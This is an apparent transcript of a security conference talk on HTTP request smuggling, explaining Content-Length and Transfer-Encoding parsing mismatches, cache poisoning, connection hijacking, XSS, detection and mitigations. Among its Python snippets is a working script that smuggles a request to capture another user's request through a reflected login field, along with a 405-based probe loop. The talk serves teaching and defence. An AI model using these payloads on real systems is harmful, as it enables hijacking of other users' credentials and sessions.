Welcome to this talk on request smuggling. My name is Philippe Arteau. Thank you for the great presentation, Max. So I have one slide left to do: I'm a security researcher at GoSecure, like Max, and I focus mainly on application security. If you have a question about any of those projects, you can poke me afterward.

The topic of today is HTTP request smuggling, which I'll shorten to request smuggling. The way I've divided this talk: first, we're going to start with an introduction to the key concept needed to understand request smuggling, mainly HTTP pipelining as introduced by HTTP/1.1. There have been some new variants recently, but I'm going to focus on the techniques related to HTTP/1.1 specifically. Then I'm going to give an overview of the different attacks and the risks associated with request smuggling: mainly cache poisoning, credential or connection hijacking, URL filtering bypass, and XSS. At the end, I'm going to present the available mitigations depending on what appliances you have installed. This applies both to cloud providers and to on-premise infrastructure. I'll also give key takeaways to summarize everything.

This presentation doesn't bring new exploits or new CVEs specifically. What I've tried to do is an introduction to request smuggling that summarizes three main presentations. First, in 2005, the company Watchfire introduced the concept of request smuggling. Already in that 2005 paper, most of the risks I'm going to present were covered: cache poisoning, XSS, and connection hijacking. Then in 2016, the French researcher Régis Leroy presented at DEF CON a variant of the same attack using a different header, Transfer-Encoding; we're going to see later how it works. But what really put request smuggling on the map is the presentation from James Kettle in 2019, introducing again some small new variants but mainly presenting actual cases against high-profile websites. We're going to see a few of those examples in this presentation. At that point in 2019, it became a really popular vulnerability class and people became much more aware of it. In 2016, the proofs of concept were not as convincing, I would say, even though the papers were detailing every step of the exploits.

To understand request smuggling, we need to understand HTTP pipelining. Pipelining is a concept from HTTP/1.1. The main difference between HTTP/1.0 and 1.1 is that initially, one HTTP request meant one TCP connection. This is not great for performance, because there is a handshake involved every time you make a request. For a simple plain HTML web page, it could make sense; it's simple to implement. The thing is, as soon as you have a couple of images, stylesheets, and JavaScript files referenced by that page, suddenly you need a ton of TCP connections just to load one page. In 1.1, persistent connections were introduced. With this concept, we are able to put multiple requests into the same pipeline, the HTTP pipeline, in a continuous manner. HTTP/1.1 also introduced the Transfer-Encoding header, which will be used in some variants later.

So visually, how does HTTP pipelining look? Pipelining is used by clients, and HTTP clients include bots, browsers, and backend servers that communicate with other backend servers. A proxy would do HTTP pipelining because, in the end, it doesn't want to create a ton of sockets for every client; it wants to reuse connections to reduce the number of TCP handshakes.
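To make pipelining concrete, here is a minimal sketch at the socket level (example.com is just a placeholder host; a real server may or may not honor pipelined requests):

```python
import socket

HOST = "example.com"  # hypothetical target; any HTTP/1.1 server

# Two requests written back to back on ONE TCP connection,
# without waiting for the first response (HTTP/1.1 pipelining).
req1 = f"GET / HTTP/1.1\r\nHost: {HOST}\r\n\r\n".encode()
req2 = f"GET / HTTP/1.1\r\nHost: {HOST}\r\nConnection: close\r\n\r\n".encode()

sock = socket.create_connection((HOST, 80))
sock.sendall(req1 + req2)  # one handshake, two request/response exchanges

# Responses arrive in order; the server closes after the second one.
while True:
    chunk = sock.recv(4096)
    if not chunk:
        break
    print(chunk.decode(errors="replace"))
sock.close()
```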
So if one client sends two requests, we can see here that the requests are placed first in the socket connection. If we have another client that sends two other requests, they are potentially going to be placed in the same connection pool, or the same connection, I should say. Here, it's a pool of only one connection, so in the same socket we have four requests from two different clients. Another reason proxies do HTTP pipelining is that you don't have to wait for the response before sending another request: you can send all the requests at once and parse the responses as they come. So that's HTTP pipelining.

Now, if we look inside the socket at multiple requests in one connection, we can see a few requests here, three requests. If I add some color, we can distinguish the three of them. But how does the proxy or the web server know where each request ends? This is really important: we have multiple clients and multiple requests per client, so we need to know where everything ends in a precise manner. I've added some color, but servers are not guessing; they need a clear spec. What they use here is Content-Length. The Content-Length header is pretty simple. With Content-Length: 0, after the headers we have two new lines, \r\n twice, and then the content of the POST body, the body of the request. Here it's 0 bytes, so right away we continue to the next request. The second request is a POST request where the Content-Length is not 0, because it has multiple POST parameters. So here it's simple: Content-Length is read, and this way we know where every request ends.
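To make that concrete, here is a toy parser (my own sketch, ignoring Transfer-Encoding and many edge cases) that splits a pipelined byte stream using Content-Length, which is exactly the job the proxy and the backend must agree on:

```python
def split_requests(stream: bytes) -> list[bytes]:
    """Split a pipelined byte stream into individual requests, using
    Content-Length to find where each body ends (toy parser, for
    illustration only)."""
    requests = []
    while stream:
        head, _, rest = stream.partition(b"\r\n\r\n")  # end of headers
        length = 0
        for line in head.split(b"\r\n")[1:]:  # skip the request line
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        body, stream = rest[:length], rest[length:]
        requests.append(head + b"\r\n\r\n" + body)
    return requests

stream = (
    b"GET /index.html HTTP/1.1\r\nHost: a\r\nContent-Length: 0\r\n\r\n"
    b"POST /form HTTP/1.1\r\nHost: a\r\nContent-Length: 7\r\n\r\nq=hello"
)
for r in split_requests(stream):
    print(repr(r))  # two cleanly separated requests
```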
Request smuggling comes into effect when we have an infrastructure where there is a proxy between the client, so the browser, and our web server: either a proxy that we have put in place ourselves, such as our own web cache, something with firewall features, or a web proxy, or a cloud provider, maybe Cloudflare, Fastly, et cetera. Request smuggling in a nutshell is when the proxy looking at the connection interprets one request, while the backend, for the same series of bytes, sees two requests. The reason is that the parsers have some small differences that the attacker will try to capitalize on.

So let's see a first attack. This is a proof of concept taken from the first paper, the 2005 paper from Watchfire. I've taken this example because it's really simple to understand, but keep in mind that it will not work on modern systems, because, for example, nginx and Apache will simply block any request that has multiple Content-Length headers. But in the 2005 paper, all the payloads focused on a double Content-Length in one request. Here on the left we see what the proxy sees, and on the right, what the server interprets. It's the same communication; it's not two boxes, two requests. The reason the proxy and the backend don't interpret it the same way is that parsing a request is a bit like parsing JSON: you parse multiple properties, and if you have to store those values in a hash map, for example, where values are unique per key, once you encounter a duplicate you can either choose to override the existing value or simply ignore the following one.

In this case, the proxy, on the left, will always override with the last header, so it keeps the value 37 for the Content-Length, while the backend, the web server here, keeps the first one and will never override that value. You could add ten Content-Length headers; it would keep the first one, which is zero. This introduces a problem where the two sides read two different Content-Lengths, so they don't agree on where the first request ends. In the first case, it ends between "blah" and GET /test, while in the second case it ends right before GET /profile.

So what is the effect? The first scenario presented in the 2005 paper, out of the four or five risks, is cache poisoning, because on the left the proxy thinks we're requesting the index and then the test page, while the backend is answering for the paths /index and /profile/1237. If our proxy also has a caching feature, the first page will be returned as expected, so the response matches what was requested, but for the second page we're actually returning user data, profile information for user ID 1237, and the content of this JSON will override test.htm in the cache. This is problematic because the attacker sends this malicious request once, but every user who requests test.htm afterward will be served the poisoned resource.

Here are the other risks presented in this first paper, already in 2005. Cache poisoning, as we just saw. The capability to bypass URL filtering: if there are paths that are blacklisted by the proxy, think of an administrative console, a monitoring console, or any management page that needs to be blacklisted, these could be reached anyway. Credential hijacking, or connection hijacking, which is when we send a second request that is incomplete, so it grabs the following request, a request from another user, and we try to get some of its values reflected; we're going to see an example in a moment. Persistent XSS, which I put in quotes: we can force HTML or JavaScript onto users visiting the website without any special interaction. All they need to do is visit the website and they receive an XSS; there will be a demo of this at the end of the presentation. And open redirect, which is a very similar case to the XSS.
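To make the duplicate Content-Length ambiguity concrete before moving on, here is a toy illustration (my own sketch, not the Watchfire code): the same headers read under a keep-first versus a keep-last policy yield two different body lengths, so the two parsers disagree on where the request ends:

```python
# Toy illustration of the 2005 double Content-Length desync. Modern
# servers reject duplicate Content-Length headers, so this is history.
RAW_HEADERS = [
    ("Host", "example.com"),
    ("Content-Length", "0"),    # the backend keeps the FIRST value
    ("Content-Length", "37"),   # the proxy keeps the LAST value
]

def content_length(headers, keep="first"):
    values = [v for (k, v) in headers if k.lower() == "content-length"]
    return int(values[0] if keep == "first" else values[-1])

print("proxy reads a body of", content_length(RAW_HEADERS, keep="last"), "bytes")
print("backend reads a body of", content_length(RAW_HEADERS, keep="first"), "bytes")
# The 37 bytes the proxy forwards as "body" are treated by the backend
# as the START OF A NEW REQUEST: that is the smuggled request.
```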
Now I'm going to present an example, but this time with a more modern technique: the technique presented in the DEF CON talk by Régis Leroy, using Transfer-Encoding: chunked. Chunked transfer encoding is a feature of HTTP/1.1 that aims to let a server provide huge responses. Think of a large XML file that is generated on the fly, where you don't know the length of the response ahead of time. Instead of computing everything in memory, knowing the size, and then sending the response, with chunked transfer encoding you can send your file one chunk at a time. So here I have a file that I'm generating on the fly. The way it works is that the first line is always the size, in hexadecimal, of the line that follows; after that, you can pass any binary or ASCII value. The first chunk is eight characters long, so we have 8 and then "NorthSec". Then the "conference" chunk has a length of 11, so we pass B, which is 11 in hexadecimal. And the last part is always a zero, just to acknowledge to the browser that we're done sending the response, that it is complete. So here we have no Content-Length describing the whole response at once.

Why is this feature useful to us? While it might be aimed at server responses, it can also be used in a request. If I'm requesting the index page from myapp.com, I can also send the POST body in chunked format, and that's what we're going to abuse. It can be abused because Content-Length and Transfer-Encoding are, in a way, colliding: they serve the same purpose of describing the length of the body of a POST request. When this was introduced, the RFC specified what you should do if the client sends both Content-Length and Transfer-Encoding: when there is Transfer-Encoding, you should use that header and ignore Content-Length entirely. So Transfer-Encoding should take priority. But the way the Transfer-Encoding header is parsed may differ from one infrastructure to another, from one server to another.

Here is an example, where the backend parses the Transfer-Encoding header even though the header separation is invalid. As you might know, every header in an HTTP request should be separated by \r\n. This is not a Windows versus Linux thing; every request, no matter the platform, should always use \r\n. But this specific backend was also parsing headers whose new lines are just \n, not the full \r\n. For this reason, the proxy parses the request per the spec and only sees the Content-Length; it doesn't see the Transfer-Encoding header in the first request. But given the same communication, our backend parses it differently and switches into chunked mode. And for this reason, the zero that was placed initially is interpreted as a following chunk of size zero, ending the request, and then another request starts. What happens is that we have a request in the pipeline that is not yet completed. We receive a response for the first part, in blue, but the next user who sends a request will have their request basically glued to the one we started. We are forcing the update-profile request onto that user: all their cookies and all the headers from their request will be appended to our partial request. That's what we see visually in orange. This is called connection hijacking.

A few other alternatives to this were found in the talk by James Kettle. That was the main focus of his 2019 talk: he found tons of variations in actual software, for example placing a non-printable character between the colon and "chunked". As you can see, there are a ton of variations, and the Burp plugin that was released to support this testing includes numerous variations. If you read James Kettle's paper, you will see that the variants are often referred to by short names, which I'll also be using later in this presentation. The prefix is always what the proxy sees and the second part is what the backend sees: so sometimes the proxy looks at Content-Length while the backend interprets Transfer-Encoding, and this is not one-sided, sometimes it can be reversed.
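Here is a small sketch (my own, assuming a lenient backend like the one just described) of how a parser that tolerates bare \n line endings can "see" a Transfer-Encoding header that a strict \r\n parser never does:

```python
# The same raw bytes, parsed strictly (\r\n only, per spec) versus
# leniently (bare \n also accepted). The lenient parser discovers a
# Transfer-Encoding header the strict parser misses, so the two sides
# frame the body differently: that is the desync.
import re

RAW = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 42\r\n"
       b"Foo: bar\nTransfer-Encoding: chunked\r\n\r\n")

def parse_headers(raw: bytes, lenient: bool) -> dict:
    head = raw.split(b"\r\n\r\n", 1)[0]
    sep = rb"\r?\n" if lenient else rb"\r\n"
    lines = re.split(sep, head)[1:]  # skip the request line
    return {k.strip().lower(): v.strip()
            for k, _, v in (l.partition(b":") for l in lines)}

strict = parse_headers(RAW, lenient=False)
loose = parse_headers(RAW, lenient=True)
print("proxy (strict) sees Transfer-Encoding:",
      b"transfer-encoding" in strict)  # False -> uses Content-Length
print("backend (lenient) sees Transfer-Encoding:",
      b"transfer-encoding" in loose)   # True -> switches to chunked mode
```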
Now, an example of connection hijacking: very similar to the previous one, where we were forcing the update-profile request, but this is a real-case scenario found by James Kettle on the New Relic platform, specifically the login server. The first element to recognize is that the login email field is reflected in the page. As soon as there's an incorrect login (we're forcing an incorrect password, so there's no chance the login will succeed), the email is reflected in the page. So what can we do about this if we have detected that the server is also vulnerable to HTTP request smuggling?

Here we use the Transfer-Encoding chunked technique. It's very similar to the double Content-Length header payload we had initially, the simple payload from the beginning, but here we take advantage of overriding the Transfer-Encoding header with "x", just to nullify the fact that chunked mode is even enabled. So the proxy doesn't see chunking at all, because it keeps the last header in the case of duplicate headers. On the other side, we can see what the backend sees: we're starting a new request for the login. This is the request that reflects the login email field, but we're not going to finish the request. We specify a huge Content-Length, and basically we grab the following request, content from another user. What James Kettle managed to do is a proof of concept where he was able to intercept POST requests to the login page, which were then reflected in his form when he submitted the request on the left.

Now here's an example of how we can abuse the same technique for XSS. Instead of grabbing the next request, we append something to force an XSS into the response of the next user, the user whose request is next in the HTTP pipeline. This is a very simple case. It was found, I think, in a SaaS provider that was kept anonymous, but basically it looks like a provider whose backend simply doesn't support chunked encoding; it's probably a proprietary, homemade stack. Because the backend doesn't support chunked encoding, we abuse it by making the Content-Length huge to grab almost everything, while the first request is using chunked: the chunk sizes 10 and 66 consume the actual request, the first part of the request we want to force, while the backend sees it differently. I'm going to do a demo in a moment with a simpler XSS case, but here we're injecting into the body. As for the response the second user will see: the SAML parameter is not the response itself but what is sent to the page, and because the SAML parameter was reflected in the response, we could exploit the XSS here.

Why do this instead of a plain reflected XSS? First, there is no interaction needed, and sometimes there are specific conditions that make an XSS theoretically unexploitable; with request smuggling, we can sometimes add headers that are required for the exploitation.
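A hedged sketch of the "grab the next user's request" structure just described (hypothetical host and endpoint; a Content-Length-trusting front-end and a chunked-parsing back-end are assumed, and real payloads must be tuned to the exact server pair):

```python
# The smuggled inner request declares an inflated Content-Length, so
# the backend waits and swallows the NEXT request on the connection as
# the inner request's body, and /login reflects the email field back.
import socket

HOST = "vulnerable.example"  # hypothetical target

inner = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 500\r\n"  # inflated: forces the backend to wait
    b"\r\n"
    b"email="                    # the victim's raw request lands here
)

outer = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: " + str(len(b"0\r\n\r\n" + inner)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"  # hidden from the front-end in real attacks
    b"\r\n"
    b"0\r\n\r\n" + inner  # backend: chunked body ends at 0, inner begins
)

with socket.create_connection((HOST, 80)) as s:
    s.sendall(outer)
    print(s.recv(4096).decode(errors="replace"))
```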
So we needed a demo, and I'm going to demonstrate request smuggling with a very simple website called, well, "simple website". This website has a contact form that is interesting because if we add some additional parameters that are not there initially, they are reflected here in the page. So we might look for a potential XSS by appending some value, but we can see that everything is encoded. The catch is that everything here is encoded by the browser, and this is what makes the XSS theoretically not exploitable: if I send this to Repeater, it's not really exploitable unless you're targeting old versions of IE. But if we send an actual payload that is unescaped, unencoded, we can see that it's actually reflected. (Am I on the right page? Yes.) I'm going to add some characters to make it more visual, but we can see that everything here is not escaped. So we're going to take advantage of the fact that we can exploit it this way by crafting our own request. It's a simple request where the proxy looks at the Content-Length header while the backend supports chunked encoding properly and sees two different requests, the second one starting here. We will not see the response for the second request, but any user whose request follows ours will receive an XSS.

So I send this malicious payload. What we receive here is the response for the first request, so nothing special. If we're a user navigating the website, we're not going to see anything yet, and this is something you need to be aware of with request smuggling: proxies often have multiple connection pools, so you might need multiple requests. Here I'm using Apache Traffic Server, and after ten requests we can see that a user was hijacked. I could have been visiting any page; in the end, I received the response for the contact form. So that's the quick demo.

Before building a payload like this, how can you discover such a vulnerability? Here I have a quick payload. There is a plugin, and there are different scanners, that will try to detect this. This payload basically tests both chunked and Content-Length at the same time, and what we want to see is whether, if the second request is actually parsed in chunked mode, we can append one character (it could be X, it could be G, anything) to the next request, just to break its method. The next request's method should be a POST or a GET or potentially a PUT, let's say. When we send this, we're not going to see anything at first, but if we send a lot of requests with our payload, at some point we might receive something like a 405 Not Allowed; 405 stands for Method Not Allowed. Why does it come to this? Because the backend is actually seeing a "GPOST" here: we're repeating a POST request prefixed with our smuggled byte, and at some point our request combines with a previous one. I remember hearing in one of James Kettle's presentations that for one exploit he had to send 800 requests to confirm the vulnerability. This is a vulnerability that is hard to confirm, because on real infrastructure you're not the only one making requests. You need to be patient and have a good idea of what you're testing. If you can extract, for example, versions or some information about which proxy is being used and what the backend is, you can pinpoint a vulnerability like this more precisely. I know the scanner from the Burp plugin is using a timing technique, and this is not perfect, because it will miss a few cases, including the demo I've presented: I ran the scanner and it didn't find it. But I'm going to show a quick tip to still find the vulnerability if you're using the plugin.
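A sketch of that detection idea (my own loop, not the Burp plugin's logic; the host is a placeholder): send the probe many times and watch for a 405, which can be triggered on a later probe by a previous probe's leftover "G":

```python
# 405-based detection loop for the CL.TE case described above.
import socket

HOST = "vulnerable.example"  # hypothetical target

body = b"0\r\n\r\nG"  # backend ends the chunked body at 0, leaving "G" behind
probe = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + body
)

for attempt in range(50):  # proxies keep several pools: repeat a lot
    try:
        with socket.create_connection((HOST, 80), timeout=5) as s:
            s.sendall(probe)
            status = s.recv(1024).split(b"\r\n", 1)[0]
    except OSError:
        continue
    if b"405" in status:
        # A previous probe's "G" turned this POST into "GPOST".
        print(f"attempt {attempt}: {status!r} -> likely desync")
        break
```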
Okay, so now: how do you defend against this vulnerability? The quick, easy answer is just to do your updates. Apache Traffic Server, nginx, Varnish, and HAProxy have all received fixes. There are some exceptions: I know F5 BIG-IP was mentioned in a presentation where they say they have done a fix, but it's actually not built in; they point to mitigations instead. If you have F5 in your infrastructure, there are two methods to mitigate the issue, and one of them is to activate Advanced WAF with a specific rule to block request smuggling. So be aware that sometimes a vendor says there's a fix when actually there is a mitigation method; in the case of F5, they have created a new rule.

Don't try to modify your own application to mitigate this. Adding a few security headers won't fix the issue: Content-Security-Policy will have no effect at preventing these types of incidents, because we're controlling all the other parameters and even part of the body. Cloud services have provided some fixes, but none of the providers listed here have made a public response about how they implemented them. There is, however, RFC 7230, which gives guidelines on how you should normalize requests: when you have both Transfer-Encoding and Content-Length, how you can normalize the query to be sure that there is no ambiguity. Presumably that's what they are using.

This is a screenshot for detection. Detection is one of the best ways to be 100% sure: even if you have done your updates, verify that you're not vulnerable. It's an extra layer of protection, and doing some manual tests will be helpful too. This is the Burp plugin; these are all the tests that can be run with the request smuggling scan. Be aware that some cases will not be found, because the scanner expects a timeout to be produced by some payloads, and in multiple cases that I've tested, it didn't find the vulnerability that I had introduced. But you can still find the vulnerability using the plugin. If you have the Flow plugin for Burp (Flow basically shows you all the requests going through Burp, everything you see in the proxy but also requests initiated by plugins), you will see the requests initiated by the plugin here, and any 405 response should be considered fishy and analyzed, because either that request or one of the previous ones has introduced a glitch that produced a bad method. So look for 405s; this is important. If you're doing manual testing, make sure your client has Content-Length rewriting disabled, because by default Burp will simply rewrite the Content-Length header, and it might break your payload without you noticing. So be aware of this.

We're already at the last slide, so, takeaways: request smuggling can greatly affect your application. We've seen multiple risks and attacks, so this is not only one vector; there are multiple avenues. If you might be vulnerable to this, make sure you test your environment with automated tools and potentially manual testing. There are some new variants that I don't have time to cover: recently there have been variants using WebSockets and HTTP/2. While in 2019 James Kettle had some new variants around Transfer-Encoding, these newer ones specifically allow bypassing URL filtering. If you have time to check them out, there are some nice proofs of concept available from the company that initially found the HTTP/2 issues. And apparently this year's talk from James Kettle is going to be on HTTP/2; most of the related CVEs were already published late last year, and it was nominated as one of the top 10 attacks of last year.
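As a closing illustration of that RFC 7230 normalization guidance, here is a hedged sketch (my own checks, not any vendor's actual code) of what a front-end can do: reject any request whose framing is ambiguous instead of guessing, so the proxy and the backend can never disagree on where it ends:

```python
def is_ambiguous(head: bytes) -> bool:
    """Flag request heads whose framing two parsers could disagree on
    (sketch in the spirit of RFC 7230, not a complete implementation)."""
    lines = head.split(b"\r\n")
    if any(b"\n" in line or b"\r" in line for line in lines):
        return True  # bare CR/LF inside a header line: lenient-parser bait
    names = [l.split(b":", 1)[0].strip().lower() for l in lines[1:] if b":" in l]
    if names.count(b"content-length") > 1:
        return True  # duplicate Content-Length (the 2005 attack)
    if b"content-length" in names and b"transfer-encoding" in names:
        return True  # both framing headers present: CL.TE / TE.CL bait
    return False

head = (b"POST / HTTP/1.1\r\nHost: a\r\n"
        b"Content-Length: 6\r\nTransfer-Encoding: chunked")
print(is_ambiguous(head))  # True -> respond 400 and close the connection
```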
If you are looking for the slides, there is this short link. And to reproduce the demonstrations I've made (I didn't have time to do the HTTP/2 one, but if you're curious), these are in the slides as well. The slides should already be available.